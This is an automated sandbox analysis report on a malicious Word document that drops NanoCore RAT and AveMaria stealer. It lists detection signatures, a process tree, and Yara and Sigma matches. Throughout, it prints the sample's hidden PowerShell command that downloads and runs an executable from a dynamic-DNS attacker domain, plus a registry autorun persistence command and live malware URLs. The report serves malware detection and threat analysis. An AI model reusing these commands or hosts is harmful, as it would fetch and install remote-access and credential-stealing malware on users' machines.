Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report NEW PO1100372954 -.doc

Overview

General Information

Sample Name:NEW PO1100372954 -.doc
Analysis ID:457815
MD5:afe48e30fc3f12c2b6ad7d19ae1fff8e
SHA1:2ded99867d8b3e9499b10743ae732efec19ccc8e
SHA256:ecef57afce8a7d5eed2080401da0ce36d67c2493cf1385b432a6bf0a65f6e521
Tags:doc
Infos:

Most interesting Screenshot:

Detection

NanoCore AveMaria
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: NanoCore
Sigma detected: Powershell download and execute file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected AveMaria stealer
Yara detected Nanocore RAT
.NET source code contains very large strings
Allocates memory in foreign processes
Bypasses PowerShell execution policy
Contains functionality to hide user accounts
Contains functionality to inject threads in other processes
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal e-mail passwords
Creates a thread in another existing process (thread injection)
Creates an undocumented autostart registry key
Document exploit detected (process start blacklist hit)
Found suspicious RTF objects
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides user accounts
Increases the number of concurrent connection per server for Internet Explorer
Injects a PE file into a foreign processes
Injects files into Windows application
Installs a global keyboard hook
Machine Learning detection for dropped file
Microsoft Office creates scripting files
Office process drops PE file
Powershell drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: PowerShell DownloadFile
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to download and execute files (via powershell)
Tries to harvest and steal browser information (history, passwords, etc)
Uses dynamic DNS services
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create new users
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Enables driver privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Exploit for CVE-2017-0261
Sigma detected: PowerShell Download from URL
Sigma detected: Verclsid.exe Runs COM Object
Spawns drivers
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 2604 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
    • powershell.exe (PID: 2396 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • FLTLDR.EXE (PID: 3048 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT MD5: AF5CCD95BAC7ADADD56DE185D7461B2C)
    • powershell.exe (PID: 1068 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • putty.exe (PID: 2952 cmdline: 'C:\Users\user\AppData\Roaming\putty.exe' MD5: 0CFE251E0B61BBC87656F52DEFAD4C53)
        • putty.exe (PID: 2308 cmdline: C:\Users\user\AppData\Roaming\putty.exe MD5: 0CFE251E0B61BBC87656F52DEFAD4C53)
          • cmd.exe (PID: 2156 cmdline: cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
            • reg.exe (PID: 2400 cmdline: REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe' MD5: D69A9ABBB0D795F21995C2F48C1EB560)
          • images.exe (PID: 2168 cmdline: C:\ProgramData\images.exe MD5: 0CFE251E0B61BBC87656F52DEFAD4C53)
            • images.exe (PID: 2820 cmdline: C:\ProgramData\images.exe MD5: 0CFE251E0B61BBC87656F52DEFAD4C53)
              • cmd.exe (PID: 912 cmdline: C:\Windows\System32\cmd.exe MD5: AD7B9C14083B52BC532FBA5948342B98)
              • iBCrDCK.i.exe (PID: 2340 cmdline: 'C:\Users\user\AppData\Roaming\iBCrDCK.i.exe' MD5: 8FA8F52DFC55D341300EFF8E4C44BA33)
                • iBCrDCK.i.exe (PID: 2260 cmdline: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe MD5: 8FA8F52DFC55D341300EFF8E4C44BA33)
                • iBCrDCK.i.exe (PID: 2428 cmdline: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe MD5: 8FA8F52DFC55D341300EFF8E4C44BA33)
    • powershell.exe (PID: 3056 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • putty.exe (PID: 2948 cmdline: 'C:\Users\user\AppData\Roaming\putty.exe' MD5: 0CFE251E0B61BBC87656F52DEFAD4C53)
        • putty.exe (PID: 1492 cmdline: C:\Users\user\AppData\Roaming\putty.exe MD5: 0CFE251E0B61BBC87656F52DEFAD4C53)
        • putty.exe (PID: 2260 cmdline: C:\Users\user\AppData\Roaming\putty.exe MD5: 0CFE251E0B61BBC87656F52DEFAD4C53)
        • putty.exe (PID: 2428 cmdline: C:\Users\user\AppData\Roaming\putty.exe MD5: 0CFE251E0B61BBC87656F52DEFAD4C53)
    • verclsid.exe (PID: 1900 cmdline: 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5 MD5: 3796AE13F680D9239210513EDA590E86)
    • notepad.exe (PID: 2416 cmdline: 'C:\Windows\system32\NOTEPAD.EXE' 'C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT' MD5: B32189BDFF6E577A92BAA61AD49264E6)
  • drvinst.exe (PID: 1464 cmdline: DrvInst.exe '1' '200' 'UMB\UMB\1&841921d&0&TERMINPUT_BUS' '' '' '6e3bed883' '0000000000000000' '000000000000059C' '0000000000000600' MD5: 2DBA1472BDF847EAE358A4B9FA9AB0C1)
  • rdpdr.sys (PID: 4 cmdline: MD5: 1B6163C503398B23FF8B939C67747683)
  • tdtcp.sys (PID: 4 cmdline: MD5: 51C5ECEB1CDEE2468A1748BE550CFBC8)
  • tssecsrv.sys (PID: 4 cmdline: MD5: 19BEDA57F3E0A06B8D5EB6D619BD5624)
  • RDPWD.SYS (PID: 4 cmdline: MD5: FE571E088C2D83619D2D48D4E961BF41)
  • smtpsvc.exe (PID: 2964 cmdline: 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' MD5: 8FA8F52DFC55D341300EFF8E4C44BA33)
    • smtpsvc.exe (PID: 764 cmdline: C:\Program Files (x86)\SMTP Service\smtpsvc.exe MD5: 8FA8F52DFC55D341300EFF8E4C44BA33)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000015.00000003.2137169067.0000000000613000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000015.00000003.2137169067.0000000000613000.00000004.00000001.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
      00000022.00000002.2354192632.0000000000AC0000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x5b0b:$x1: NanoCore.ClientPluginHost
      • 0x5b44:$x2: IClientNetworkHost
      00000022.00000002.2354192632.0000000000AC0000.00000004.00000001.sdmpNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0x5b0b:$x2: NanoCore.ClientPluginHost
      • 0x5c0f:$s4: PipeCreated
      • 0x5b25:$s5: IClientLoggingHost
      00000022.00000002.2354334039.0000000000C60000.00000004.00000001.sdmpNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x5b99:$x1: NanoCore.ClientPluginHost
      • 0x5bb3:$x2: IClientNetworkHost
      Click to see the 90 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      34.2.iBCrDCK.i.exe.cb0000.15.raw.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0x350b:$x1: NanoCore.ClientPluginHost
      • 0x3525:$x2: IClientNetworkHost
      34.2.iBCrDCK.i.exe.cb0000.15.raw.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0x350b:$x2: NanoCore.ClientPluginHost
      • 0x52b6:$s4: PipeCreated
      • 0x34f8:$s5: IClientLoggingHost
      34.2.iBCrDCK.i.exe.34ffadc.25.unpackNanocore_RAT_Gen_2Detetcs the Nanocore RATFlorian Roth
      • 0xd9ad:$x1: NanoCore.ClientPluginHost
      • 0xd9da:$x2: IClientNetworkHost
      34.2.iBCrDCK.i.exe.34ffadc.25.unpackNanocore_RAT_Feb18_1Detects Nanocore RATFlorian Roth
      • 0xd9ad:$x2: NanoCore.ClientPluginHost
      • 0xea88:$s4: PipeCreated
      • 0xd9c7:$s5: IClientLoggingHost
      34.2.iBCrDCK.i.exe.34ffadc.25.unpackJoeSecurity_NanocoreYara detected Nanocore RATJoe Security
        Click to see the 140 entries

        Sigma Overview

        AV Detection:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe, ProcessId: 2428, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

        E-Banking Fraud:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe, ProcessId: 2428, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

        System Summary:

        barindex
        Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
        Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2604, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', ProcessId: 2396
        Sigma detected: PowerShell DownloadFileShow sources
        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2604, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', ProcessId: 2396
        Sigma detected: Direct Autorun Keys ModificationShow sources
        Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe', CommandLine: REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe', CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe', ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2156, ProcessCommandLine: REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe', ProcessId: 2400
        Sigma detected: Exploit for CVE-2017-0261Show sources
        Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT, CommandLine: 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT, CommandLine|base64offset|contains: , Image: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE, NewProcessName: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE, OriginalFileName: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2604, ProcessCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT, ProcessId: 3048
        Sigma detected: PowerShell Download from URLShow sources
        Source: Process startedAuthor: Florian Roth, oscd.community, Jonhnathan Ribeiro: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2604, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', ProcessId: 2396
        Sigma detected: Verclsid.exe Runs COM ObjectShow sources
        Source: Process startedAuthor: Victor Sergeev, oscd.community: Data: Command: 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, CommandLine: 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, CommandLine|base64offset|contains: , Image: C:\Windows\System32\verclsid.exe, NewProcessName: C:\Windows\System32\verclsid.exe, OriginalFileName: C:\Windows\System32\verclsid.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2604, ProcessCommandLine: 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5, ProcessId: 1900
        Sigma detected: Group Modification LoggingShow sources
        Source: Event LogsAuthor: Alexandr Yampolskyi, SOC Prime: Data: EventID: 4728, Source: Microsoft-Windows-Security-Auditing, data 0: -, data 1: S-1-5-21-966771315-3019405637-367336477-1007, data 2: None, data 3: user-PC, data 4: S-1-5-21-966771315-3019405637-367336477-513, data 5: S-1-5-21-966771315-3019405637-367336477-1006, data 6: user, data 7: user-PC, data 8: 0x14825, data 9: -
        Sigma detected: Local User CreationShow sources
        Source: Event LogsAuthor: Patrick Bareiss: Data: EventID: 4720, Source: Microsoft-Windows-Security-Auditing, data 0: eC.vaAf, data 1: user-PC, data 10: -, data 11: %%1793, data 12: %%1793, data 13: %%1793, data 14: %%1793, data 15: %%1793, data 16: %%1794, data 17: %%1794, data 18: 513, data 19: -, data 2: S-1-5-21-966771315-3019405637-367336477-1007, data 20: 0x0, data 21: 0x15, data 22: %%2080 %%2082 %%2084, data 23: %%1793, data 24: -, data 25: %%1797, data 3: S-1-5-21-966771315-3019405637-367336477-1006, data 4: user, data 5: user-PC, data 6: 0x14825, data 7: -, data 8: eC.vaAf, data 9: %%1793
        Sigma detected: Non Interactive PowerShellShow sources
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2604, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', ProcessId: 2396

        Data Obfuscation:

        barindex
        Sigma detected: Powershell download and execute fileShow sources
        Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 2604, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://newhosteeeee.ydns.eu/putty.exe','C:\Users\user\AppData\Roaming\putty.exe');Start-Process 'C:\Users\user\AppData\Roaming\putty.exe'', ProcessId: 2396

        Stealing of Sensitive Information:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe, ProcessId: 2428, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

        Remote Access Functionality:

        barindex
        Sigma detected: NanoCoreShow sources
        Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Roaming\iBCrDCK.i.exe, ProcessId: 2428, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Antivirus detection for URL or domainShow sources
        Source: http://hutyrtit.ydns.eu/microC.exeAvira URL Cloud: Label: malware
        Multi AV Scanner detection for dropped fileShow sources
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeReversingLabs: Detection: 19%
        Source: C:\Program Files\Microsoft DN1\sqlmap.dllMetadefender: Detection: 20%Perma Link
        Source: C:\Program Files\Microsoft DN1\sqlmap.dllReversingLabs: Detection: 42%
        Source: C:\ProgramData\images.exeReversingLabs: Detection: 28%
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\microC[1].exeReversingLabs: Detection: 19%
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exeReversingLabs: Detection: 28%
        Source: C:\Users\user\AppData\Roaming\iBCrDCK.i.exeReversingLabs: Detection: 19%
        Source: C:\Users\user\AppData\Roaming\putty.exeReversingLabs: Detection: 28%
        Multi AV Scanner detection for submitted fileShow sources
        Source: NEW PO1100372954 -.docReversingLabs: Detection: 23%
        Yara detected AveMaria stealerShow sources
        Source: Yara matchFile source: 21.2.images.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.images.exe.3b52b48.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.putty.exe.3802b48.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.images.exe.3b52b48.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.putty.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.putty.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.putty.exe.3751b08.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.putty.exe.3791b08.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 17.2.images.exe.3aa1b08.9.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.3.images.exe.6115d8.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.putty.exe.3842b48.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.3.images.exe.61381d.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 11.2.putty.exe.3802b48.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.images.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 13.2.putty.exe.400000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 10.2.putty.exe.3842b48.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.3.images.exe.6115d8.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000015.00000003.2137169067.0000000000613000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000003.2137304291.0000000000607000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.2119294130.0000000002637000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000002.2122718897.0000000003601000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000003.2137077371.0000000000603000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000B.00000002.2119646724.00000000025F7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000D.00000003.2118755811.00000000005B6000.00000004.00000001.sdmp, type: MEMORY
